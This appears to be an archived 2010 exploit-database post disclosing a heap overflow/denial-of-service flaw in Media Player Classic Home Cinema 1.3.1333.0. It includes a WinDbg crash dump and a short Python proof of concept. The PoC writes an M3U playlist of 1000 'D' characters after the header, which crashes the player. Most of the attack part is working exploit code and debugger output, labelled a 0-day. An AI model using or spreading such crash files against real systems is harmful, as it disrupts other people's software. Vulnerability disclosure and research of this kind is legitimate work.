Media Player Classic Heap Overflow/DoS Vulnerability
Posted on 26 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Media Player Classic Heap Overflow/DoS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Media Player Classic Heap Overflow/DoS Vulnerability ==================================================== Tested on: Media Player Classic - Home Cinema Build number: 1.3.1333.0 MPC Compiler: VS 2008 FFmpeg Compiler: GCC 4.4.1 ###################CRASH REPORT START################## ModLoad: 77be0000 77bf5000 C:WINDOWSsystem32MSACM32.dll ModLoad: 77bd0000 77bd7000 C:WINDOWSsystem32midimap.dll ModLoad: 73ee0000 73ee4000 C:WINDOWSsystem32KsUser.dll ModLoad: 10000000 100fb000 C:Program FilesK-Lite Codec PackFiltersvsfilter.dll ModLoad: 590b0000 590ce000 C:WINDOWSsystem32wmpasf.dll ModLoad: 71b20000 71b32000 C:WINDOWSsystem32MPR.dll ModLoad: 6bf50000 6bfcd000 C:WINDOWSsystem32dxmasf.dll ModLoad: 02530000 0257f000 C:WINDOWSsystem32DRMClien.DLL (6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!) ............................... ISSUE eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32kernel32.dll - kernel32!RaiseException+0x52: 7c812aeb 5e pop esi Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:004> g WARNING: Continuing a non-continuable exception (6dc.cec): Break instruction exception - code 80000003 (first chance) eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mpc_hc+0x31d14b: 0071d14b cc int 3 ###################CRASH REPORT END################## For images related to the vulnerability refer my blog http://darshanams.blogspot.com ##########PoC Start################ print(" *****Program need to be run on Python 3.1*****") print ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS (0-Day) Tested on: Windows XP SP3 Media Player Classic - Home Cinema Build number: 1.3.1333.0 MPC Compiler: VS 2008 FFmpeg Compiler: GCC 4.4.1 """) head = "EXTM3U" buf = "D" * 1000 mal_buf = head + buf #print ("mal_buf:",mal_buf) try: mpc_mal = open("mpc_m3u_crash.m3u",'w') mpc_mal.write (mal_buf) mpc_mal.close() print ("File Created Successfully: mpc_m3u_crash.m3u ") except: print ("Cannnot Create M3U File ") print ("[+] Found and Coded by: Praveen Darshanam ") ##########PoC End################ Best Regards, Praveen Darshanam, Security Researcher # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
